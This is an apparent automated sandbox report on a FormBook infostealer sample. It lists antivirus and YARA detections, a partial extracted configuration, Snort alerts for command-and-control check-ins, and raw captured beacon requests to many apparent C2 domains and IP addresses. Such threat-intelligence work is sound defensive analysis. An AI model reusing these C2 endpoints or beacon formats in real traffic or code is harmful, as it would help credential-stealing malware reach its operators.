Analysis Report JAAkR51fQY.exe

AV Detection:

Antivirus detection for URL or domain

Source: http://www.yyyut6.com/csv8/www.alparmuhendislik.com	Avira URL Cloud: Label: phishing
Source: http://www.yyyut6.com	Avira URL Cloud: Label: phishing
Source: http://www.yyyut6.com/csv8/?EZUXxJ=XH4K2dDF2Z84HBPAGb7BC8YK+Vs0QVFZSQgY+MY/R5kdga2e+ACccNk2g5CQED5lfKqn&DzrLH=VBZHYDrxndGXyf	Avira URL Cloud: Label: phishing
Source: http://www.yyyut6.com/csv8/	Avira URL Cloud: Label: phishing

Found malware configuration

Source: 4.2.vbc.exe.400000.0.unpack

Malware Configuration Extractor: FormBook {"Config: ": ["CONFIG_PATTERNS 0x79e0", "KEY1_OFFSET 0x1bbc8", "CONFIG SIZE : 0xc1", "CONFIG OFFSET 0x1bc99", "URL SIZE : 24", "searching string pattern", "strings_offset 0x1a6a3", "searching hashes pattern", "--------------------------------------------------", "Decrypted Function Hashes", "--------------------------------------------------", "0xa0e749e3", "0xf43668a6", "0x980476e5", "0x35a6d50c", "0xf89290dc", "0x94261f57", "0x7d54c891", "0x47cb721", "0xf72d70a3", "0x9f715030", "0xbf0a5e41", "0x2902d074", "0xf653b199", "0xc8c42cc6", "0x2e1b7599", "0x210d4d07", "0x6d2a7921", "0x8ea85a2f", "0x207c50ff", "0xb967410a", "0x1eb17415", "0xb46802f8", "0x11da8518", "0xf42ed5c", "0x2885a3d3", "0x445675fa", "0x5c289b4c", "0x40ede5aa", "0xf24946a2", "0x8559c3e2", "0xb9d34d23", "0xa14d0a19", "0x2d07bbe2", "0xbbd1d68c", "0xb28c29d4", "0x3911edeb", "0xefad046d", "0xa0605497", "0xf5529cbf", "0x5507576a", "0xfa2467c8", "0x5b6423bf", "0xe22409b9", "0xde1eba2", "0xae847e2", "0xa8cfcc9", "0x26fc2c69", "0x5d8a75ac", "0x22eb3474", "0x2b37c918", "0x79402007", "0x7544791c", "0x641b2c94", "0x1db04ecf", "0xf5d02cd8", "0xad0121e4", "0x6206e716", "0x5e4b9b9a", "0xe4e2f5f4", "0x54c93159", "0x25ea79b", "0x5bf29119", "0xd6507db", "0x32ffc9f8", "0xe4cfab72", "0x98db5380", "0xce4cc542", "0x3092a0a2", "0x66053660", "0x2607a133", "0xfcd01355", "0x80b41d4", "0x4102ad8d", "0x857bf6a6", "0xd3ec6064", "0x23145fc4", "0xc026698f", "0x8f5385d8", "0x2430512b", "0x3ebe9086", "0x4c6fddb5", "0x276db13e", "0xe00f0a8e", "0x85cf9404", "0xb2248784", "0xcdc7e023", "0x11f5f50", "0x1dd4bc1c", "0x8235fce2", "0xc72ce2d5", "0x263178b", "0x57585356", "0x9cb95240", "0xcc39fef", "0x9347ac57", "0x9d9522dc", "0x911bc70e", "0x74443db9", "0xf04c1aa9", "0x6484bcb5", "0x11fc2f72", "0x2b44324f", "0x9d70beea", "0x59adf952", "0x172ac7b4", "0x5d4b4e66", "0xed297eae", "0xa88492a6", "0xb21b057c", "0x70f35767", "0xb6f4d5a8", "0x67cea859", "0xc1626bff", "0xb4e1ae2", "0x24a48dcf", "0xe11da208", "0x1c920818", "0x65f4449c", "0xc30bc050", "0x3e86e1fb", "0x9e01fc32", "0x216500c2", "0x48e207c9", "0x2decf13e", "0x19996921", "0xb7da3dd7", "0x47f39d2b", "0x6777e2de", "0xd980e37f", "0x963fea3b", "0xacddb7ea", "0x110aec35", "0x647331f3", "0x2e381da4", "0x50f66474", "0xec16e0c0", "0xf9d81a42", "0xd6c6f9db", "0xef3df91", "0x60e0e203", "0x7c81caaf", "0x71c2ec76", "0x25e431cc", "0x106f568f", "0x6a60c8a9", "0xb758aab3", "0x3b34de90", "0x700420f5", "0xee359a7e", "0xd1d808a", "0x47ba47a5", "0xff959c4c", "0x5d30a87d", "0xaa95a900", "0x80b19064", "0x9c5a481a", "0x1dd252d", "0xdb3055fc", "0xe0cf8bf1", "0x3a48eabc", "0xf0472f97", "0x4a6323de", "0x4260edca", "0x53f7fb4f", "0x3d2e9c99", "0xf6879235", "0xe6723cac", "0xe184dfaa", "0xe99ffaa0", "0xf6aebe25", "0xefadf9a5", "0x215de938", "0x757906aa", "0x84f8d766", "0xb6494f65", "0x13a75318", "0x5bde5587", "0xe9eba2a4", "0x6b8a0df3", "0x9c02f250", "0xe52a2a2e", "0xdb96173c", "0x3c0f2fc", "0xc30c49a6", "0xcb591d7f", "0x5c4ee455", "0x7c81c71d", "0x11c6f95e", "----------------------------

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\zLIpEDZOH.exe

ReversingLabs: Detection: 31%

Multi AV Scanner detection for submitted file

Source: JAAkR51fQY.exe	Virustotal: Detection: 31%			Perma Link
Source: JAAkR51fQY.exe	ReversingLabs: Detection: 31%

Yara detected FormBook

Source: Yara match	File source: 0000000A.00000002.585911893.0000000000A90000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.268975653.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.587186497.0000000002BE0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.269629188.0000000005610000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.583664848.0000000000700000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.269603953.00000000055E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.230538128.000000000446C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 4.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\zLIpEDZOH.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: JAAkR51fQY.exe

Joe Sandbox ML: detected

Antivirus or Machine Learning detection for unpacked file

Source: 0.2.JAAkR51fQY.exe.6d0000.0.unpack	Avira: Label: TR/Crypt.XPACK.Gen2
Source: 4.2.vbc.exe.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen

Compliance:

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\JAAkR51fQY.exe

Unpacked PE file: 0.2.JAAkR51fQY.exe.6d0000.0.unpack

Uses 32bit PE files

Source: JAAkR51fQY.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Contains modern PE file flags such as dynamic base (ASLR) or NX

Source: JAAkR51fQY.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Binary contains paths to debug symbols

Source:	Binary string: wntdll.pdbUGP source: vbc.exe, 00000004.00000002.269880810.00000000057AF000.00000040.00000001.sdmp, wlanext.exe, 0000000A.00000002.587511214.0000000002E60000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: vbc.exe, wlanext.exe
Source:	Binary string: wlanext.pdb source: vbc.exe, 00000004.00000002.269706677.0000000005660000.00000040.00000001.sdmp
Source:	Binary string: vbc.pdb source: wlanext.exe, 0000000A.00000002.592768859.0000000003647000.00000004.00000001.sdmp
Source:	Binary string: wlanext.pdbGCTL source: vbc.exe, 00000004.00000002.269706677.0000000005660000.00000040.00000001.sdmp

Software Vulnerabilities:

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Code function: 4x nop then jmp 07922DADh		0_2_07922D38
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Code function: 4x nop then jmp 07922DADh		0_2_07922D2A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4x nop then pop ebx		4_2_00406A94
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4x nop then pop edi		4_2_0040C3D7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4x nop then pop edi		4_2_0040C3AE
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 4x nop then pop ebx		10_2_00706A96
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 4x nop then pop edi		10_2_0070C3D7
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 4x nop then pop edi		10_2_0070C3AE

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49736 -> 99.83.185.45:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49736 -> 99.83.185.45:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49736 -> 99.83.185.45:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49737 -> 104.21.13.175:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49737 -> 104.21.13.175:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49737 -> 104.21.13.175:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49759 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49759 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49759 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49760 -> 99.83.185.45:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49760 -> 99.83.185.45:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49760 -> 99.83.185.45:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49761 -> 104.21.13.175:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49761 -> 104.21.13.175:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49761 -> 104.21.13.175:80

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET /csv8/?EZUXxJ=Z54U04wqGI300YwketVjcixyHBr4HpwtQE6vF0nldb1Lz0z4UH78CnHRphUFHPRBURpw&DzrLH=VBZHYDrxndGXyf HTTP/1.1Host: www.colliapse.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /csv8/?EZUXxJ=Vx5DYRfwQ2epFb7A1EFDXiUpfmaHAUA5hBGztbTHqIjku20m3oo4TlvQkKcY2MtY2Zvt&DzrLH=VBZHYDrxndGXyf HTTP/1.1Host: www.masterzushop.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /csv8/?EZUXxJ=9kzRsbxjodB183f+254XmaaPYHqImudbPq/bqqkJnFvk55YE4DuWwUiPiLBFKkj0LF/s&DzrLH=VBZHYDrxndGXyf HTTP/1.1Host: www.aldanasanchezmx.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /csv8/?EZUXxJ=wz9bsKZezgylXE2xySv04yz/UXtzAnP44BanueQcObrBh8vQr+0W6/ezJrtA4EzaB/eD&DzrLH=VBZHYDrxndGXyf HTTP/1.1Host: www.bhoomimart.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /csv8/?EZUXxJ=XH4K2dDF2Z84HBPAGb7BC8YK+Vs0QVFZSQgY+MY/R5kdga2e+ACccNk2g5CQED5lfKqn&DzrLH=VBZHYDrxndGXyf HTTP/1.1Host: www.yyyut6.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /csv8/?EZUXxJ=qrM/jq4OcB9vG2RwEV9Oj1wgtu+jolIiSW/njvsFRiZ9j79vyWJq+CFtdr2TsRW1k8yh&DzrLH=VBZHYDrxndGXyf HTTP/1.1Host: www.alparmuhendislik.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /csv8/?EZUXxJ=QLtdsMlXP7ZQlvjWT7fAeOzLoSV1+fXm7wWs73uECgmLouwXj2mCPN/rnODxivVfv92N&DzrLH=VBZHYDrxndGXyf HTTP/1.1Host: www.globepublishers.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /csv8/?EZUXxJ=SPYfUtJhDLYzT/ro+iJTgsw3x4bzIhIKNu8aW1ARl1xXF5uYI7qDVxucqZEX6pWizqEA&DzrLH=VBZHYDrxndGXyf HTTP/1.1Host: www.thedigitalsatyam.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /csv8/?EZUXxJ=0hV2NfdVjmx+yfQvTLszaaA4nyOLrpeuP9TqtJZz9egJMD1sBqTfWGO8dwDzLIh3ahLd&DzrLH=VBZHYDrxndGXyf HTTP/1.1Host: www.scheherazadelegault.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /csv8/?EZUXxJ=JcDbJrKBTdSh2qrV/QHXhZH9/vCGpAjnUxGYv0DqxJ8xNpceyS+NtrlgJ2Ns4M+VWFGw&DzrLH=VBZHYDrxndGXyf HTTP/1.1Host: www.starrockindia.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /csv8/?EZUXxJ=qn4X4+yxbbSsDYaEiiQ2PWd8LlsUN5GHqTXva27qpzu+WFndrUbREk96g9Cvik6UddJD&DzrLH=VBZHYDrxndGXyf HTTP/1.1Host: www.studentdividers.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /csv8/?EZUXxJ=iJ9LMG7MliwQjz4N9h8Hq4mQMyMQ8EbCXmiUEypb7zSuax6avA4zdFyQt2cMJ86uh/oE&DzrLH=VBZHYDrxndGXyf HTTP/1.1Host: www.epicmassiveconcepts.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /csv8/?EZUXxJ=Z54U04wqGI300YwketVjcixyHBr4HpwtQE6vF0nldb1Lz0z4UH78CnHRphUFHPRBURpw&DzrLH=VBZHYDrxndGXyf HTTP/1.1Host: www.colliapse.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /csv8/?EZUXxJ=Vx5DYRfwQ2epFb7A1EFDXiUpfmaHAUA5hBGztbTHqIjku20m3oo4TlvQkKcY2MtY2Zvt&DzrLH=VBZHYDrxndGXyf HTTP/1.1Host: www.masterzushop.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /csv8/?EZUXxJ=9kzRsbxjodB183f+254XmaaPYHqImudbPq/bqqkJnFvk55YE4DuWwUiPiLBFKkj0LF/s&DzrLH=VBZHYDrxndGXyf HTTP/1.1Host: www.aldanasanchezmx.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /csv8/?EZUXxJ=wz9bsKZezgylXE2xySv04yz/UXtzAnP44BanueQcObrBh8vQr+0W6/ezJrtA4EzaB/eD&DzrLH=VBZHYDrxndGXyf HTTP/1.1Host: www.bhoomimart.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /csv8/?EZUXxJ=XH4K2dDF2Z84HBPAGb7BC8YK+Vs0QVFZSQgY+MY/R5kdga2e+ACccNk2g5CQED5lfKqn&DzrLH=VBZHYDrxndGXyf HTTP/1.1Host: www.yyyut6.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /csv8/?EZUXxJ=qrM/jq4OcB9vG2RwEV9Oj1wgtu+jolIiSW/njvsFRiZ9j79vyWJq+CFtdr2TsRW1k8yh&DzrLH=VBZHYDrxndGXyf HTTP/1.1Host: www.alparmuhendislik.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /csv8/?EZUXxJ=QLtdsMlXP7ZQlvjWT7fAeOzLoSV1+fXm7wWs73uECgmLouwXj2mCPN/rnODxivVfv92N&DzrLH=VBZHYDrxndGXyf HTTP/1.1Host: www.globepublishers.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /csv8/?EZUXxJ=SPYfUtJhDLYzT/ro+iJTgsw3x4bzIhIKNu8aW1ARl1xXF5uYI7qDVxucqZEX6pWizqEA&DzrLH=VBZHYDrxndGXyf HTTP/1.1Host: www.thedigitalsatyam.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /csv8/?EZUXxJ=0hV2NfdVjmx+yfQvTLszaaA4nyOLrpeuP9TqtJZz9egJMD1sBqTfWGO8dwDzLIh3ahLd&DzrLH=VBZHYDrxndGXyf HTTP/1.1Host: www.scheherazadelegault.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /csv8/?EZUXxJ=JcDbJrKBTdSh2qrV/QHXhZH9/vCGpAjnUxGYv0DqxJ8xNpceyS+NtrlgJ2Ns4M+VWFGw&DzrLH=VBZHYDrxndGXyf HTTP/1.1Host: www.starrockindia.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 198.185.159.144 198.185.159.144
Source: Joe Sandbox View	IP Address: 198.185.159.144 198.185.159.144

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: OVHFR OVHFR
Source: Joe Sandbox View	ASN Name: EGIHOSTINGUS EGIHOSTINGUS

Downloads files from webservers via HTTP

Source: global traffic	HTTP traffic detected: GET /csv8/?EZUXxJ=Z54U04wqGI300YwketVjcixyHBr4HpwtQE6vF0nldb1Lz0z4UH78CnHRphUFHPRBURpw&DzrLH=VBZHYDrxndGXyf HTTP/1.1Host: www.colliapse.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /csv8/?EZUXxJ=Vx5DYRfwQ2epFb7A1EFDXiUpfmaHAUA5hBGztbTHqIjku20m3oo4TlvQkKcY2MtY2Zvt&DzrLH=VBZHYDrxndGXyf HTTP/1.1Host: www.masterzushop.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /csv8/?EZUXxJ=9kzRsbxjodB183f+254XmaaPYHqImudbPq/bqqkJnFvk55YE4DuWwUiPiLBFKkj0LF/s&DzrLH=VBZHYDrxndGXyf HTTP/1.1Host: www.aldanasanchezmx.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /csv8/?EZUXxJ=wz9bsKZezgylXE2xySv04yz/UXtzAnP44BanueQcObrBh8vQr+0W6/ezJrtA4EzaB/eD&DzrLH=VBZHYDrxndGXyf HTTP/1.1Host: www.bhoomimart.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /csv8/?EZUXxJ=XH4K2dDF2Z84HBPAGb7BC8YK+Vs0QVFZSQgY+MY/R5kdga2e+ACccNk2g5CQED5lfKqn&DzrLH=VBZHYDrxndGXyf HTTP/1.1Host: www.yyyut6.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /csv8/?EZUXxJ=qrM/jq4OcB9vG2RwEV9Oj1wgtu+jolIiSW/njvsFRiZ9j79vyWJq+CFtdr2TsRW1k8yh&DzrLH=VBZHYDrxndGXyf HTTP/1.1Host: www.alparmuhendislik.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /csv8/?EZUXxJ=QLtdsMlXP7ZQlvjWT7fAeOzLoSV1+fXm7wWs73uECgmLouwXj2mCPN/rnODxivVfv92N&DzrLH=VBZHYDrxndGXyf HTTP/1.1Host: www.globepublishers.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /csv8/?EZUXxJ=SPYfUtJhDLYzT/ro+iJTgsw3x4bzIhIKNu8aW1ARl1xXF5uYI7qDVxucqZEX6pWizqEA&DzrLH=VBZHYDrxndGXyf HTTP/1.1Host: www.thedigitalsatyam.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /csv8/?EZUXxJ=0hV2NfdVjmx+yfQvTLszaaA4nyOLrpeuP9TqtJZz9egJMD1sBqTfWGO8dwDzLIh3ahLd&DzrLH=VBZHYDrxndGXyf HTTP/1.1Host: www.scheherazadelegault.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /csv8/?EZUXxJ=JcDbJrKBTdSh2qrV/QHXhZH9/vCGpAjnUxGYv0DqxJ8xNpceyS+NtrlgJ2Ns4M+VWFGw&DzrLH=VBZHYDrxndGXyf HTTP/1.1Host: www.starrockindia.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /csv8/?EZUXxJ=qn4X4+yxbbSsDYaEiiQ2PWd8LlsUN5GHqTXva27qpzu+WFndrUbREk96g9Cvik6UddJD&DzrLH=VBZHYDrxndGXyf HTTP/1.1Host: www.studentdividers.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /csv8/?EZUXxJ=iJ9LMG7MliwQjz4N9h8Hq4mQMyMQ8EbCXmiUEypb7zSuax6avA4zdFyQt2cMJ86uh/oE&DzrLH=VBZHYDrxndGXyf HTTP/1.1Host: www.epicmassiveconcepts.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /csv8/?EZUXxJ=Z54U04wqGI300YwketVjcixyHBr4HpwtQE6vF0nldb1Lz0z4UH78CnHRphUFHPRBURpw&DzrLH=VBZHYDrxndGXyf HTTP/1.1Host: www.colliapse.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /csv8/?EZUXxJ=Vx5DYRfwQ2epFb7A1EFDXiUpfmaHAUA5hBGztbTHqIjku20m3oo4TlvQkKcY2MtY2Zvt&DzrLH=VBZHYDrxndGXyf HTTP/1.1Host: www.masterzushop.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /csv8/?EZUXxJ=9kzRsbxjodB183f+254XmaaPYHqImudbPq/bqqkJnFvk55YE4DuWwUiPiLBFKkj0LF/s&DzrLH=VBZHYDrxndGXyf HTTP/1.1Host: www.aldanasanchezmx.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /csv8/?EZUXxJ=wz9bsKZezgylXE2xySv04yz/UXtzAnP44BanueQcObrBh8vQr+0W6/ezJrtA4EzaB/eD&DzrLH=VBZHYDrxndGXyf HTTP/1.1Host: www.bhoomimart.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /csv8/?EZUXxJ=XH4K2dDF2Z84HBPAGb7BC8YK+Vs0QVFZSQgY+MY/R5kdga2e+ACccNk2g5CQED5lfKqn&DzrLH=VBZHYDrxndGXyf HTTP/1.1Host: www.yyyut6.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /csv8/?EZUXxJ=qrM/jq4OcB9vG2RwEV9Oj1wgtu+jolIiSW/njvsFRiZ9j79vyWJq+CFtdr2TsRW1k8yh&DzrLH=VBZHYDrxndGXyf HTTP/1.1Host: www.alparmuhendislik.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /csv8/?EZUXxJ=QLtdsMlXP7ZQlvjWT7fAeOzLoSV1+fXm7wWs73uECgmLouwXj2mCPN/rnODxivVfv92N&DzrLH=VBZHYDrxndGXyf HTTP/1.1Host: www.globepublishers.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /csv8/?EZUXxJ=SPYfUtJhDLYzT/ro+iJTgsw3x4bzIhIKNu8aW1ARl1xXF5uYI7qDVxucqZEX6pWizqEA&DzrLH=VBZHYDrxndGXyf HTTP/1.1Host: www.thedigitalsatyam.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /csv8/?EZUXxJ=0hV2NfdVjmx+yfQvTLszaaA4nyOLrpeuP9TqtJZz9egJMD1sBqTfWGO8dwDzLIh3ahLd&DzrLH=VBZHYDrxndGXyf HTTP/1.1Host: www.scheherazadelegault.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /csv8/?EZUXxJ=JcDbJrKBTdSh2qrV/QHXhZH9/vCGpAjnUxGYv0DqxJ8xNpceyS+NtrlgJ2Ns4M+VWFGw&DzrLH=VBZHYDrxndGXyf HTTP/1.1Host: www.starrockindia.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Performs DNS lookups

Source: unknown

DNS traffic detected: queries for: www.colliapse.com

Tries to download or post to a non-existing http route (HTTP/1.1 404 Not Found / 503 Service Unavailable)

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 NOT FOUNDServer: nginxDate: Wed, 13 Jan 2021 19:53:41 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINContent-Language: es-mxVary: Accept-Language, CookieData Raw: 64 37 61 0d 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 20 20 3c 68 65 61 64 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0a 0a 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 41 6c 64 61 6e 61 20 53 c3 a1 6e 63 68 65 7a 20 2d 20 49 6e 67 65 6e 69 65 72 6f 73 20 41 72 71 75 69 74 65 63 74 6f 73 20 7c 20 41 72 71 75 69 74 65 63 74 6f 73 20 65 6e 20 43 65 6e 74 72 6f 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 41 6c 64 61 6e 61 20 53 c3 a1 6e 63 68 65 7a 20 2d 20 49 6e 67 65 6e 69 65 72 6f 73 20 41 72 71 75 69 74 65 63 74 6f 73 20 7c 20 41 72 71 75 69 74 65 63 74 6f 73 20 65 6e 20 43 65 6e 74 72 6f 22 3e 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 41 6c 64 61 6e 61 20 53 c3 a1 6e 63 68 65 7a 20 2d 20 49 6e 67 65 6e 69 65 72 6f 73 20 41 72 71 75 69 74 65 63 74 6f 73 22 3e 0a 20 20 20 20 20 20 0a 20 20 20 20 0a 20 20 20 20 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 6f 6f 67 6c 65 62 6f 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 73 74 61 74 69 63 2f 6e 